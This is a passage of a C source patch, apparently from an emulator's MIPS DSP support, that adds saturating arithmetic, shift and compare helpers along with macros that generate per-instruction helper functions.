inline uint8_t mipsdsp_sat_add_u8(uint8_t a, uint8_t b, + CPUMIPSState *env) +{ + uint8_t result; + uint16_t temp; + + temp = (uint16_t)a + (uint16_t)b; + result = temp & 0xFF; + + if (0x0100 & temp) { + result = 0xFF; + set_DSPControl_overflow_flag(1, 20, env); + } + + return result; +} + +static inline uint16_t mipsdsp_sat_add_u16(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint16_t result; + uint32_t temp; + + temp = (uint32_t)a + (uint32_t)b; + result = temp & 0xFFFF; + + if (0x00010000 & temp) { + result = 0xFFFF; + set_DSPControl_overflow_flag(1, 20, env); + } + + return result; +} + +static inline int32_t mipsdsp_sat32_acc_q31(int32_t acc, int32_t a, + CPUMIPSState *env) +{ + int64_t temp; + int32_t temp32, temp31, result; + int64_t temp_sum; + +#ifndef TARGET_MIPS64 + temp = ((uint64_t)env->active_tc.HI[acc] << 32) | + (uint64_t)env->active_tc.LO[acc]; +#else + temp = (uint64_t)env->active_tc.LO[acc]; +#endif + + temp_sum = (int64_t)a + temp; + + temp32 = (temp_sum >> 32) & 0x01; + temp31 = (temp_sum >> 31) & 0x01; + result = temp_sum & 0xFFFFFFFF; + + if (temp32 != temp31) { + if (temp32 == 0) { + result = 0x7FFFFFFF; + } else { + result = 0x80000000; + } + set_DSPControl_overflow_flag(1, 16 + acc, env); + } + + return result; +} + +#ifdef TARGET_MIPS64 +/* a[0] is LO, a[1] is HI. */ +static inline void mipsdsp_sat64_acc_add_q63(int64_t *ret, + int32_t ac, + int64_t *a, + CPUMIPSState *env) +{ + bool temp64; + + ret[0] = env->active_tc.LO[ac] + a[0]; + ret[1] = env->active_tc.HI[ac] + a[1]; + + if (((uint64_t)ret[0] < (uint64_t)env->active_tc.LO[ac]) && + ((uint64_t)ret[0] < (uint64_t)a[0])) { + ret[1] += 1; + } + temp64 = ret[1] & 1; + if (temp64 != ((ret[0] >> 63) & 0x01)) { + if (temp64) { + ret[0] = (0x01ull << 63); + ret[1] = ~0ull; + } else { + ret[0] = (0x01ull << 63) - 1; + ret[1] = 0x00; + } + set_DSPControl_overflow_flag(1, 16 + ac, env); + } +} + +static inline void mipsdsp_sat64_acc_sub_q63(int64_t *ret, + int32_t ac, + int64_t *a, + CPUMIPSState *env) +{ + bool temp64; + + ret[0] = env->active_tc.LO[ac] - a[0]; + ret[1] = env->active_tc.HI[ac] - a[1]; + + if ((uint64_t)ret[0] > (uint64_t)env->active_tc.LO[ac]) { + ret[1] -= 1; + } + temp64 = ret[1] & 1; + if (temp64 != ((ret[0] >> 63) & 0x01)) { + if (temp64) { + ret[0] = (0x01ull << 63); + ret[1] = ~0ull; + } else { + ret[0] = (0x01ull << 63) - 1; + ret[1] = 0x00; + } + set_DSPControl_overflow_flag(1, 16 + ac, env); + } +} +#endif + +static inline int32_t mipsdsp_mul_i16_i16(int16_t a, int16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + temp = (int32_t)a * (int32_t)b; + + if ((temp > (int)0x7FFF) || (temp < (int)0xFFFF8000)) { + set_DSPControl_overflow_flag(1, 21, env); + } + temp &= 0x0000FFFF; + + return temp; +} + +static inline int32_t mipsdsp_mul_u16_u16(int32_t a, int32_t b) +{ + return a * b; +} + +#ifdef TARGET_MIPS64 +static inline int32_t mipsdsp_mul_i32_i32(int32_t a, int32_t b) +{ + return a * b; +} +#endif + +static inline int32_t mipsdsp_sat16_mul_i16_i16(int16_t a, int16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + temp = (int32_t)a * (int32_t)b; + + if (temp > (int)0x7FFF) { + temp = 0x00007FFF; + set_DSPControl_overflow_flag(1, 21, env); + } else if (temp < (int)0xffff8000) { + temp = 0xFFFF8000; + set_DSPControl_overflow_flag(1, 21, env); + } + temp &= 0x0000FFFF; + + return temp; +} + +static inline int32_t mipsdsp_mul_q15_q15_overflowflag21(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + if ((a == 0x8000) && (b == 0x8000)) { + temp = 0x7FFFFFFF; + set_DSPControl_overflow_flag(1, 21, env); + } else { + temp = ((int16_t)a * (int16_t)b) << 1; + } + + return temp; +} + +/* right shift */ +static inline uint8_t mipsdsp_rshift_u8(uint8_t a, target_ulong mov) +{ + return a >> mov; +} + +static inline uint16_t mipsdsp_rshift_u16(uint16_t a, target_ulong mov) +{ + return a >> mov; +} + +static inline int8_t mipsdsp_rashift8(int8_t a, target_ulong mov) +{ + return a >> mov; +} + +static inline int16_t mipsdsp_rashift16(int16_t a, target_ulong mov) +{ + return a >> mov; +} + +#ifdef TARGET_MIPS64 +static inline int32_t mipsdsp_rashift32(int32_t a, target_ulong mov) +{ + return a >> mov; +} +#endif + +static inline int16_t mipsdsp_rshift1_add_q16(int16_t a, int16_t b) +{ + int32_t temp; + + temp = (int32_t)a + (int32_t)b; + + return (temp >> 1) & 0xFFFF; +} + +/* round right shift */ +static inline int16_t mipsdsp_rrshift1_add_q16(int16_t a, int16_t b) +{ + int32_t temp; + + temp = (int32_t)a + (int32_t)b; + temp += 1; + + return (temp >> 1) & 0xFFFF; +} + +static inline int32_t mipsdsp_rshift1_add_q32(int32_t a, int32_t b) +{ + int64_t temp; + + temp = (int64_t)a + (int64_t)b; + + return (temp >> 1) & 0xFFFFFFFF; +} + +static inline int32_t mipsdsp_rrshift1_add_q32(int32_t a, int32_t b) +{ + int64_t temp; + + temp = (int64_t)a + (int64_t)b; + temp += 1; + + return (temp >> 1) & 0xFFFFFFFF; +} + +static inline uint8_t mipsdsp_rshift1_add_u8(uint8_t a, uint8_t b) +{ + uint16_t temp; + + temp = (uint16_t)a + (uint16_t)b; + + return (temp >> 1) & 0x00FF; +} + +static inline uint8_t mipsdsp_rrshift1_add_u8(uint8_t a, uint8_t b) +{ + uint16_t temp; + + temp = (uint16_t)a + (uint16_t)b + 1; + + return (temp >> 1) & 0x00FF; +} + +#ifdef TARGET_MIPS64 +static inline uint8_t mipsdsp_rshift1_sub_u8(uint8_t a, uint8_t b) +{ + uint16_t temp; + + temp = (uint16_t)a - (uint16_t)b; + + return (temp >> 1) & 0x00FF; +} + +static inline uint8_t mipsdsp_rrshift1_sub_u8(uint8_t a, uint8_t b) +{ + uint16_t temp; + + temp = (uint16_t)a - (uint16_t)b + 1; + + return (temp >> 1) & 0x00FF; +} +#endif + +/* 128 bits long. p[0] is LO, p[1] is HI. */ +static inline void mipsdsp_rndrashift_short_acc(int64_t *p, + int32_t ac, + int32_t shift, + CPUMIPSState *env) +{ + int64_t acc; + + acc = ((int64_t)env->active_tc.HI[ac] << 32) | + ((int64_t)env->active_tc.LO[ac] & 0xFFFFFFFF); + p[0] = (shift == 0) ? (acc << 1) : (acc >> (shift - 1)); + p[1] = (acc >> 63) & 0x01; +} + +#ifdef TARGET_MIPS64 +/* 128 bits long. p[0] is LO, p[1] is HI */ +static inline void mipsdsp_rashift_acc(uint64_t *p, + uint32_t ac, + uint32_t shift, + CPUMIPSState *env) +{ + uint64_t tempB, tempA; + + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + shift = shift & 0x1F; + + if (shift == 0) { + p[1] = tempB; + p[0] = tempA; + } else { + p[0] = (tempB << (64 - shift)) | (tempA >> shift); + p[1] = (int64_t)tempB >> shift; + } +} + +/* 128 bits long. p[0] is LO, p[1] is HI , p[2] is sign of HI.*/ +static inline void mipsdsp_rndrashift_acc(uint64_t *p, + uint32_t ac, + uint32_t shift, + CPUMIPSState *env) +{ + int64_t tempB, tempA; + + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + shift = shift & 0x3F; + + if (shift == 0) { + p[2] = tempB >> 63; + p[1] = (tempB << 1) | (tempA >> 63); + p[0] = tempA << 1; + } else { + p[0] = (tempB << (65 - shift)) | (tempA >> (shift - 1)); + p[1] = (int64_t)tempB >> (shift - 1); + if (tempB >= 0) { + p[2] = 0x0; + } else { + p[2] = ~0ull; + } + } +} +#endif + +static inline int32_t mipsdsp_mul_q15_q15(int32_t ac, uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + if ((a == 0x8000) && (b == 0x8000)) { + temp = 0x7FFFFFFF; + set_DSPControl_overflow_flag(1, 16 + ac, env); + } else { + temp = ((int16_t)a * (int16_t)b) << 1; + } + + return temp; +} + +static inline int64_t mipsdsp_mul_q31_q31(int32_t ac, uint32_t a, uint32_t b, + CPUMIPSState *env) +{ + uint64_t temp; + + if ((a == 0x80000000) && (b == 0x80000000)) { + temp = (0x01ull << 63) - 1; + set_DSPControl_overflow_flag(1, 16 + ac, env); + } else { + temp = ((int64_t)(int32_t)a * (int32_t)b) << 1; + } + + return temp; +} + +static inline uint16_t mipsdsp_mul_u8_u8(uint8_t a, uint8_t b) +{ + return (uint16_t)a * (uint16_t)b; +} + +static inline uint16_t mipsdsp_mul_u8_u16(uint8_t a, uint16_t b, + CPUMIPSState *env) +{ + uint32_t tempI; + + tempI = (uint32_t)a * (uint32_t)b; + if (tempI > 0x0000FFFF) { + tempI = 0x0000FFFF; + set_DSPControl_overflow_flag(1, 21, env); + } + + return tempI & 0x0000FFFF; +} + +#ifdef TARGET_MIPS64 +static inline uint64_t mipsdsp_mul_u32_u32(uint32_t a, uint32_t b) +{ + return (uint64_t)a * (uint64_t)b; +} +#endif + +static inline int16_t mipsdsp_rndq15_mul_q15_q15(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint32_t temp; + + if ((a == 0x8000) && (b == 0x8000)) { + temp = 0x7FFF0000; + set_DSPControl_overflow_flag(1, 21, env); + } else { + temp = ((int16_t)a * (int16_t)b) << 1; + temp = temp + 0x00008000; + } + + return (temp & 0xFFFF0000) >> 16; +} + +static inline int32_t mipsdsp_sat16_mul_q15_q15(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + if ((a == 0x8000) && (b == 0x8000)) { + temp = 0x7FFF0000; + set_DSPControl_overflow_flag(1, 21, env); + } else { + temp = (int16_t)a * (int16_t)b; + temp = temp << 1; + } + + return (temp >> 16) & 0x0000FFFF; +} + +static inline uint16_t mipsdsp_trunc16_sat16_round(int32_t a, + CPUMIPSState *env) +{ + uint16_t temp; + + + /* + * The value 0x00008000 will be added to the input Q31 value, and the code + * needs to check if the addition causes an overflow. Since a positive value + * is added, overflow can happen in one direction only. + */ + if (a > 0x7FFF7FFF) { + temp = 0x7FFF; + set_DSPControl_overflow_flag(1, 22, env); + } else { + temp = ((a + 0x8000) >> 16) & 0xFFFF; + } + + return temp; +} + +static inline uint8_t mipsdsp_sat8_reduce_precision(uint16_t a, + CPUMIPSState *env) +{ + uint16_t mag; + uint32_t sign; + + sign = (a >> 15) & 0x01; + mag = a & 0x7FFF; + + if (sign == 0) { + if (mag > 0x7F80) { + set_DSPControl_overflow_flag(1, 22, env); + return 0xFF; + } else { + return (mag >> 7) & 0xFFFF; + } + } else { + set_DSPControl_overflow_flag(1, 22, env); + return 0x00; + } +} + +static inline uint8_t mipsdsp_lshift8(uint8_t a, uint8_t s, CPUMIPSState *env) +{ + uint8_t discard; + + if (s != 0) { + discard = a >> (8 - s); + + if (discard != 0x00) { + set_DSPControl_overflow_flag(1, 22, env); + } + } + return a << s; +} + +static inline uint16_t mipsdsp_lshift16(uint16_t a, uint8_t s, + CPUMIPSState *env) +{ + uint16_t discard; + + if (s != 0) { + discard = (int16_t)a >> (15 - s); + + if ((discard != 0x0000) && (discard != 0xFFFF)) { + set_DSPControl_overflow_flag(1, 22, env); + } + } + return a << s; +} + +#ifdef TARGET_MIPS64 +static inline uint32_t mipsdsp_lshift32(uint32_t a, uint8_t s, + CPUMIPSState *env) +{ + uint32_t discard; + + if (s == 0) { + return a; + } else { + discard = (int32_t)a >> (31 - (s - 1)); + + if ((discard != 0x00000000) && (discard != 0xFFFFFFFF)) { + set_DSPControl_overflow_flag(1, 22, env); + } + return a << s; + } +} +#endif + +static inline uint16_t mipsdsp_sat16_lshift(uint16_t a, uint8_t s, + CPUMIPSState *env) +{ + uint8_t sign; + uint16_t discard; + + if (s == 0) { + return a; + } else { + sign = (a >> 15) & 0x01; + if (sign != 0) { + discard = (((0x01 << (16 - s)) - 1) << s) | + ((a >> (14 - (s - 1))) & ((0x01 << s) - 1)); + } else { + discard = a >> (14 - (s - 1)); + } + + if ((discard != 0x0000) && (discard != 0xFFFF)) { + set_DSPControl_overflow_flag(1, 22, env); + return (sign == 0) ? 0x7FFF : 0x8000; + } else { + return a << s; + } + } +} + +static inline uint32_t mipsdsp_sat32_lshift(uint32_t a, uint8_t s, + CPUMIPSState *env) +{ + uint8_t sign; + uint32_t discard; + + if (s == 0) { + return a; + } else { + sign = (a >> 31) & 0x01; + if (sign != 0) { + discard = (((0x01 << (32 - s)) - 1) << s) | + ((a >> (30 - (s - 1))) & ((0x01 << s) - 1)); + } else { + discard = a >> (30 - (s - 1)); + } + + if ((discard != 0x00000000) && (discard != 0xFFFFFFFF)) { + set_DSPControl_overflow_flag(1, 22, env); + return (sign == 0) ? 0x7FFFFFFF : 0x80000000; + } else { + return a << s; + } + } +} + +static inline uint8_t mipsdsp_rnd8_rashift(uint8_t a, uint8_t s) +{ + uint32_t temp; + + if (s == 0) { + temp = (uint32_t)a << 1; + } else { + temp = (int32_t)(int8_t)a >> (s - 1); + } + + return (temp + 1) >> 1; +} + +static inline uint16_t mipsdsp_rnd16_rashift(uint16_t a, uint8_t s) +{ + uint32_t temp; + + if (s == 0) { + temp = (uint32_t)a << 1; + } else { + temp = (int32_t)(int16_t)a >> (s - 1); + } + + return (temp + 1) >> 1; +} + +static inline uint32_t mipsdsp_rnd32_rashift(uint32_t a, uint8_t s) +{ + int64_t temp; + + if (s == 0) { + temp = (uint64_t)a << 1; + } else { + temp = (int64_t)(int32_t)a >> (s - 1); + } + temp += 1; + + return (temp >> 1) & 0xFFFFFFFFull; +} + +static inline uint16_t mipsdsp_sub_i16(int16_t a, int16_t b, CPUMIPSState *env) +{ + int16_t temp; + + temp = a - b; + if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x8000)) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp; +} + +static inline uint16_t mipsdsp_sat16_sub(int16_t a, int16_t b, + CPUMIPSState *env) +{ + int16_t temp; + + temp = a - b; + if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x8000)) { + if (a >= 0) { + temp = 0x7FFF; + } else { + temp = 0x8000; + } + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp; +} + +static inline uint32_t mipsdsp_sat32_sub(int32_t a, int32_t b, + CPUMIPSState *env) +{ + int32_t temp; + + temp = a - b; + if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x80000000)) { + if (a >= 0) { + temp = 0x7FFFFFFF; + } else { + temp = 0x80000000; + } + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0xFFFFFFFFull; +} + +static inline uint16_t mipsdsp_rshift1_sub_q16(int16_t a, int16_t b) +{ + int32_t temp; + + temp = (int32_t)a - (int32_t)b; + + return (temp >> 1) & 0x0000FFFF; +} + +static inline uint16_t mipsdsp_rrshift1_sub_q16(int16_t a, int16_t b) +{ + int32_t temp; + + temp = (int32_t)a - (int32_t)b; + temp += 1; + + return (temp >> 1) & 0x0000FFFF; +} + +static inline uint32_t mipsdsp_rshift1_sub_q32(int32_t a, int32_t b) +{ + int64_t temp; + + temp = (int64_t)a - (int64_t)b; + + return (temp >> 1) & 0xFFFFFFFFull; +} + +static inline uint32_t mipsdsp_rrshift1_sub_q32(int32_t a, int32_t b) +{ + int64_t temp; + + temp = (int64_t)a - (int64_t)b; + temp += 1; + + return (temp >> 1) & 0xFFFFFFFFull; +} + +static inline uint16_t mipsdsp_sub_u16_u16(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint8_t temp16; + uint32_t temp; + + temp = (uint32_t)a - (uint32_t)b; + temp16 = (temp >> 16) & 0x01; + if (temp16 == 1) { + set_DSPControl_overflow_flag(1, 20, env); + } + return temp & 0x0000FFFF; +} + +static inline uint16_t mipsdsp_satu16_sub_u16_u16(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint8_t temp16; + uint32_t temp; + + temp = (uint32_t)a - (uint32_t)b; + temp16 = (temp >> 16) & 0x01; + + if (temp16 == 1) { + temp = 0x0000; + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0x0000FFFF; +} + +static inline uint8_t mipsdsp_sub_u8(uint8_t a, uint8_t b, CPUMIPSState *env) +{ + uint8_t temp8; + uint16_t temp; + + temp = (uint16_t)a - (uint16_t)b; + temp8 = (temp >> 8) & 0x01; + if (temp8 == 1) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0x00FF; +} + +static inline uint8_t mipsdsp_satu8_sub(uint8_t a, uint8_t b, CPUMIPSState *env) +{ + uint8_t temp8; + uint16_t temp; + + temp = (uint16_t)a - (uint16_t)b; + temp8 = (temp >> 8) & 0x01; + if (temp8 == 1) { + temp = 0x00; + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0x00FF; +} + +#ifdef TARGET_MIPS64 +static inline uint32_t mipsdsp_sub32(int32_t a, int32_t b, CPUMIPSState *env) +{ + int32_t temp; + + temp = a - b; + if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x80000000)) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp; +} + +static inline int32_t mipsdsp_add_i32(int32_t a, int32_t b, CPUMIPSState *env) +{ + int32_t temp; + + temp = a + b; + + if (MIPSDSP_OVERFLOW_ADD(a, b, temp, 0x80000000)) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp; +} +#endif + +static inline int32_t mipsdsp_cmp_eq(int32_t a, int32_t b) +{ + return a == b; +} + +static inline int32_t mipsdsp_cmp_le(int32_t a, int32_t b) +{ + return a <= b; +} + +static inline int32_t mipsdsp_cmp_lt(int32_t a, int32_t b) +{ + return a < b; +} + +static inline int32_t mipsdsp_cmpu_eq(uint32_t a, uint32_t b) +{ + return a == b; +} + +static inline int32_t mipsdsp_cmpu_le(uint32_t a, uint32_t b) +{ + return a <= b; +} + +static inline int32_t mipsdsp_cmpu_lt(uint32_t a, uint32_t b) +{ + return a < b; +} +/*** MIPS DSP internal functions end ***/ + +#define MIPSDSP_LHI 0xFFFFFFFF00000000ull +#define MIPSDSP_LLO 0x00000000FFFFFFFFull +#define MIPSDSP_HI 0xFFFF0000 +#define MIPSDSP_LO 0x0000FFFF +#define MIPSDSP_Q3 0xFF000000 +#define MIPSDSP_Q2 0x00FF0000 +#define MIPSDSP_Q1 0x0000FF00 +#define MIPSDSP_Q0 0x000000FF + +#define MIPSDSP_SPLIT32_8(num, a, b, c, d) \ + do { \ + a = (num >> 24) & MIPSDSP_Q0; \ + b = (num >> 16) & MIPSDSP_Q0; \ + c = (num >> 8) & MIPSDSP_Q0; \ + d = num & MIPSDSP_Q0; \ + } while (0) + +#define MIPSDSP_SPLIT32_16(num, a, b) \ + do { \ + a = (num >> 16) & MIPSDSP_LO; \ + b = num & MIPSDSP_LO; \ + } while (0) + +#define MIPSDSP_RETURN32_8(a, b, c, d) ((target_long)(int32_t) \ + (((uint32_t)a << 24) | \ + (((uint32_t)b << 16) | \ + (((uint32_t)c << 8) | \ + ((uint32_t)d & 0xFF))))) +#define MIPSDSP_RETURN32_16(a, b) ((target_long)(int32_t) \ + (((uint32_t)a << 16) | \ + ((uint32_t)b & 0xFFFF))) + +#ifdef TARGET_MIPS64 +#define MIPSDSP_SPLIT64_16(num, a, b, c, d) \ + do { \ + a = (num >> 48) & MIPSDSP_LO; \ + b = (num >> 32) & MIPSDSP_LO; \ + c = (num >> 16) & MIPSDSP_LO; \ + d = num & MIPSDSP_LO; \ + } while (0) + +#define MIPSDSP_SPLIT64_32(num, a, b) \ + do { \ + a = (num >> 32) & MIPSDSP_LLO; \ + b = num & MIPSDSP_LLO; \ + } while (0) + +#define MIPSDSP_RETURN64_16(a, b, c, d) (((uint64_t)a << 48) | \ + ((uint64_t)b << 32) | \ + ((uint64_t)c << 16) | \ + (uint64_t)d) +#define MIPSDSP_RETURN64_32(a, b) (((uint64_t)a << 32) | (uint64_t)b) +#endif + +/** DSP Arithmetic Sub-class insns **/ +#define MIPSDSP32_UNOP_ENV(name, func, element) \ +target_ulong helper_##name(target_ulong rt, CPUMIPSState *env) \ +{ \ + DSP32Value dt; \ + unsigned int i; \ + \ + dt.sw[0] = rt; \ + \ + for (i = 0; i < ARRAY_SIZE(dt.element); i++) { \ + dt.element[i] = mipsdsp_##func(dt.element[i], env); \ + } \ + \ + return (target_long)dt.sw[0]; \ +} +MIPSDSP32_UNOP_ENV(absq_s_ph, sat_abs16, sh) +MIPSDSP32_UNOP_ENV(absq_s_qb, sat_abs8, sb) +MIPSDSP32_UNOP_ENV(absq_s_w, sat_abs32, sw) +#undef MIPSDSP32_UNOP_ENV + +#if defined(TARGET_MIPS64) +#define MIPSDSP64_UNOP_ENV(name, func, element) \ +target_ulong helper_##name(target_ulong rt, CPUMIPSState *env) \ +{ \ + DSP64Value dt; \ + unsigned int i; \ + \ + dt.sl[0] = rt; \ + \ + for (i = 0; i < ARRAY_SIZE(dt.element); i++) { \ + dt.element[i] = mipsdsp_##func(dt.element[i], env); \ + } \ + \ + return dt.sl[0]; \ +} +MIPSDSP64_UNOP_ENV(absq_s_ob, sat_abs8, sb) +MIPSDSP64_UNOP_ENV(absq_s_qh, sat_abs16, sh) +MIPSDSP64_UNOP_ENV(absq_s_pw, sat_abs32, sw) +#undef MIPSDSP64_UNOP_ENV +#endif + +#define MIPSDSP32_BINOP(name, func, element) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt) \ +{ \ + DSP32Value ds, dt; \ + unsigned int i; \ + \ + ds.sw[0] = rs; \ + dt.sw[0] = rt; \ + \ + for (i = 0; i < ARRAY_SIZE(ds.element); i++) { \ + ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i]); \ + } \ + \ + return (target_long)ds.sw[0]; \ +} +MIPSDSP32_BINOP(addqh_ph, rshift1_add_q16, sh); +MIPSDSP32_BINOP(addqh_r_ph, rrshift1_add_q16, sh); +MIPSDSP32_BINOP(addqh_r_w, rrshift1_add_q32, sw); +MIPSDSP32_BINOP(addqh_w, rshift1_add_q32, sw); +MIPSDSP32_BINOP(adduh_qb, rshift1_add_u8, ub); +MIPSDSP32_BINOP(adduh_r_qb, rrshift1_add_u8, ub); +MIPSDSP32_BINOP(subqh_ph, rshift1_sub_q16, sh); +MIPSDSP32_BINOP(subqh_r_ph, rrshift1_sub_q16, sh); +MIPSDSP32_BINOP(subqh_r_w, rrshift1_sub_q32, sw); +MIPSDSP32_BINOP(subqh_w, rshift1_sub_q32, sw); +#undef MIPSDSP32_BINOP + +#define MIPSDSP32_BINOP_ENV(name, func, element) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + DSP32Value ds, dt; \ + unsigned int i; \ + \ + ds.sw[0] = rs; \ + dt.sw[0] = rt; \ + \ + for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ + ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i], env); \ + } \ + \ + return (target_long)ds.sw[0]; \ +} +MIPSDSP32_BINOP_ENV(addq_ph, add_i16, sh) +MIPSDSP32_BINOP_ENV(addq_s_ph, sat_add_i16, sh) +MIPSDSP32_BINOP_ENV(addq_s_w, sat_add_i32, sw); +MIPSDSP32_BINOP_ENV(addu_ph, add_u16, sh) +MIPSDSP32_BINOP_ENV(addu_qb, add_u8, ub); +MIPSDSP32_BINOP_ENV(addu_s_ph, sat_add_u16, sh) +MIPSDSP32_BINOP_ENV(addu_s_qb, sat_add_u8, ub); +MIPSDSP32_BINOP_ENV(subq_ph, sub_i16, sh); +MIPSDSP32_BINOP_ENV(subq_s_ph, sat16_sub, sh); +MIPSDSP32_BINOP_ENV(subq_s_w, sat32_sub, sw); +MIPSDSP32_BINOP_ENV(subu_ph, sub_u16_u16, sh); +MIPSDSP32_BINOP_ENV(subu_qb, sub_u8, ub); +MIPSDSP32_BINOP_ENV(subu_s_ph, satu16_sub_u16_u16, sh); +MIPSDSP32_BINOP_ENV(subu_s_qb, satu8_sub, ub); +#undef MIPSDSP32_BINOP_ENV + +#ifdef TARGET_MIPS64 +#define MIPSDSP64_BINOP(name, func, element) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt) \ +{ \ + DSP64Value ds, dt; \ + unsigned int i; \ + \ + ds.sl[0] = rs; \ + dt.sl[0] = rt; \ + \ + for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ + ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i]); \ + } \ + \ + return ds.sl[0]; \ +} +MIPSDSP64_BINOP(adduh_ob, rshift1_add_u8, ub); +MIPSDSP64_BINOP(adduh_r_ob, rrshift1_add_u8, ub); +MIPSDSP64_BINOP(subuh_ob, rshift1_sub_u8, ub); +MIPSDSP64_BINOP(subuh_r_ob, rrshift1_sub_u8, ub); +#undef MIPSDSP64_BINOP + +#define MIPSDSP64_BINOP_ENV(name, func, element) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + DSP64Value ds, dt; \ + unsigned int i; \ + \ + ds.sl[0] = rs; \ + dt.sl[0] = rt; \ + \ + for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ + ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i], env); \ + } \ + \ + return ds.sl[0]; \ +} +MIPSDSP64_BINOP_ENV(addq_pw, add_i32, sw); +MIPSDSP64_BINOP_ENV(addq_qh, add_i16, sh); +MIPSDSP64_BINOP_ENV(addq_s_pw, sat_add_i32, sw); +MIPSDSP64_BINOP_ENV(addq_s_qh, sat_add_i16, sh); +MIPSDSP64_BINOP_ENV(addu_ob, add_u8, uh); +MIPSDSP64_BINOP_ENV(addu_qh, add_u16, uh); +MIPSDSP64_BINOP_ENV(addu_s_ob, sat_add_u8, uh); +MIPSDSP64_BINOP_ENV(addu_s_qh, sat_add_u16, uh); +MIPSDSP64_BINOP_ENV(subq_pw, sub32, sw); +MIPSDSP64_BINOP_ENV(subq_qh, sub_i16, sh); +MIPSDSP64_BINOP_ENV(subq_s_pw, sat32_sub, sw); +MIPSDSP64_BINOP_ENV(subq_s_qh, sat16_sub, sh); +MIPSDSP64_BINOP_ENV(subu_ob, sub_u8, uh); +MIPSDSP64_BINOP_ENV(subu_qh, sub_u16_u16, uh); +MIPSDSP64_BINOP_ENV(subu_s_ob, satu8_sub, uh); +MIPSDSP64_BINOP_ENV(subu_s_qh, satu16_sub_u16_u16, uh); +#undef MIPSDSP64_BINOP_ENV + +#endif + +#define SUBUH_QB(name, var) \ +target_ulong helper_##name##_qb(target_ulong rs, target_ulong rt) \ +{ \ + uint8_t rs3, rs2, rs1, rs0; \ + uint8_t rt3, rt2, rt1, rt0; \ + uint8_t tempD, tempC, tempB, tempA; \ + \ + MIPSDSP_SPLIT32_8(rs, rs3, rs2, rs1, rs0); \ + MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ + \ + tempD = ((uint16_t)rs3 - (uint16_t)rt3 + var) >> 1; \ + tempC = ((uint16_t)rs2 - (uint16_t)rt2 + var) >> 1; \ + tempB = ((uint16_t)rs1 - (uint16_t)rt1 + var) >> 1; \ + tempA = ((uint16_t)rs0 - (uint16_t)rt0 + var) >> 1; \ + \ + return ((uint32_t)tempD << 24) | ((uint32_t)tempC << 16) | \ + ((uint32_t)tempB << 8) | ((uint32_t)tempA); \ +} + +SUBUH_QB(subuh, 0); +SUBUH_QB(subuh_r, 1); + +#undef SUBUH_QB + +target_ulong helper_addsc(target_ulong rs, target_ulong rt, CPUMIPSState *env) +{ + uint64_t temp, tempRs, tempRt; + bool flag; + + tempRs = (uint64_t)rs & MIPSDSP_LLO; + tempRt = (uint64_t)rt & MIPSDSP_LLO; + + temp = tempRs + tempRt; + flag = (temp & 0x0100000000ull) >> 32; + set_DSPControl_carryflag(flag, env); + + return (target_long)(int32_t)(temp & MIPSDSP_LLO); +} + +target_ulong helper_addwc(target_ulong rs, target_ulong rt, CPUMIPSState *env) +{ + uint32_t rd; + int32_t temp32, temp31; + int64_t tempL; + + tempL = (int64_t)(int32_t)rs + (int64_t)(int32_t)rt + + get_DSPControl_carryflag(env); + temp31 = (tempL >> 31) & 0x01; + temp32 = (tempL >> 32) & 0x01; + + if (temp31 != temp32) { + set_DSPControl_overflow_flag(1, 20, env); + } + + rd = tempL & MIPSDSP_LLO; + + return (target_long)(int32_t)rd; +} + +target_ulong helper_modsub(target_ulong rs, target_ulong rt) +{ + int32_t decr; + uint16_t lastindex; + target_ulong rd; + + decr = rt & MIPSDSP_Q0; + lastindex = (rt >> 8) & MIPSDSP_LO; + + if ((rs & MIPSDSP_LLO) == 0x00000000) { + rd = (target_ulong)lastindex; + } else { + rd = rs - decr; + } + + return rd; +} + +target_ulong helper_raddu_w_qb(target_ulong rs) +{ + target_ulong ret = 0; + DSP32Value ds; + unsigned int i; + + ds.uw[0] = rs; + for (i = 0; i < 4; i++) { + ret += ds.ub[i]; + } + return ret; +} + +#if defined(TARGET_MIPS64) +target_ulong helper_raddu_l_ob(target_ulong rs) +{ + target_ulong ret = 0; + DSP64Value ds; + unsigned int i; + + ds.ul[0] = rs; + for (i = 0; i < 8; i++) { + ret += ds.ub[i]; + } + return ret; +} +#endif + +#define PRECR_QB_PH(name, a, b)\ +target_ulong helper_##name##_qb_ph(target_ulong rs, target_ulong rt) \ +{ \ + uint8_t tempD, tempC, tempB, tempA; \ + \ + tempD = (rs >> a) & MIPSDSP_Q0; \ + tempC = (rs >> b) & MIPSDSP_Q0; \ + tempB = 